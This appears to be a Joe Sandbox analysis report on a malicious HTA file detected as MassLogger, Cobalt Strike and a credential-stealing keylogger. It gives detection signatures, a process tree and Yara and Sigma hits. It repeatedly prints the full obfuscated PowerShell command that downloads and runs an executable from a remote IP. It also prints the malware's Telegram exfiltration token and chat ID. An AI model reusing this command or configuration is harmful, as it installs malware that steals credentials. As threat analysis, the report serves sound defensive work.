Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
needagoodplanforsuccesstogetbackbest.hta

Overview

General Information

Sample name:needagoodplanforsuccesstogetbackbest.hta
Analysis ID:1640151
MD5:151ebe266eb058faf3a2a749fc6c918a
SHA1:6c7e0493b004fb0d48a72a6fd7fac0dd1843daf4
SHA256:ea7cb3e80587b9322c9985ea5318728a0fb4fa9a25304a1f0a944d39b65bfa20
Tags:htaMassLoggeruser-abuse_ch
Infos:

Detection

Cobalt Strike, MSIL Logger, MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Powershell decode and execute
Yara detected Telegram RAT
.NET source code references suspicious native API functions
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 6964 cmdline: mshta.exe "C:\Users\user\Desktop\needagoodplanforsuccesstogetbackbest.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 5064 cmdline: "C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5308 cmdline: POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 6844 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 4932 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5CF.tmp" "c:\Users\user\AppData\Local\Temp\43swuu3x\CSC1706E7A7601C443B9125CD5A3AB1B1B7.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • csoss.exe (PID: 6740 cmdline: "C:\Users\user\AppData\Roaming\csoss.exe" MD5: 54DE0C8E192E7BC71B6D284FFF136296)
          • RegSvcs.exe (PID: 5484 cmdline: "C:\Users\user\AppData\Roaming\csoss.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7598843355:AAHehybWWiULdkPS1RLFstdr4_yw-SdkoII", "Telegram Chatid": "7668947425"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
        00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0xefdf:$a1: get_encryptedPassword
          • 0xf307:$a2: get_encryptedUsername
          • 0xed7a:$a3: get_timePasswordChanged
          • 0xee9b:$a4: get_passwordField
          • 0xeff5:$a5: set_encryptedPassword
          • 0x10951:$a7: get_logins
          • 0x10602:$a8: GetOutlookPasswords
          • 0x103f4:$a9: StartKeylogger
          • 0x108a1:$a10: KeyLoggerEventArgs
          • 0x10451:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 17 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          6.2.csoss.exe.eb0000.1.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            6.2.csoss.exe.eb0000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              6.2.csoss.exe.eb0000.1.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                6.2.csoss.exe.eb0000.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  6.2.csoss.exe.eb0000.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0xd3df:$a1: get_encryptedPassword
                  • 0xd707:$a2: get_encryptedUsername
                  • 0xd17a:$a3: get_timePasswordChanged
                  • 0xd29b:$a4: get_passwordField
                  • 0xd3f5:$a5: set_encryptedPassword
                  • 0xed51:$a7: get_logins
                  • 0xea02:$a8: GetOutlookPasswords
                  • 0xe7f4:$a9: StartKeylogger
                  • 0xeca1:$a10: KeyLoggerEventArgs
                  • 0xe851:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 13 entries

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi32_5308.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious MSHTA Child Process
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB
                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5308, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline", ProcessId: 6844, ProcessName: csc.exe
                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5308, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csoss[1].exe
                    Sigma detected: Dynamic CSharp Compile Artefact
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5308, TargetFilename: C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))", CommandLine: POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7I

                    Data Obfuscation

                    barindex
                    Sigma detected: Dot net compiler compiles file from suspicious location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))'))